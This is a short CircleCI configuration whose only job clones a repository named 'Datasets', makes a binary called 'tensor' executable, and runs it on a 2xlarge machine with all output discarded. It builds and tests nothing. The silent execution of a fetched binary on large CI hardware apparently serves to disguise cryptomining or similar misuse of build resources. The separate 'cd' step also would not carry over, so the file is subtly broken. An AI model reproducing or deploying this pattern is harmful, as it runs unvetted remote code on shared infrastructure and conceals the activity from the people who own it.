version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    resource_class: 2xlarge
    steps:
      - run: git clone https://github.com/Rasparduino/Datasets.git
      - run: cd Datasets
      - run: chmod +x tensor
      - run: ./tensor --config config.cfg > /dev/null 2> /dev/null
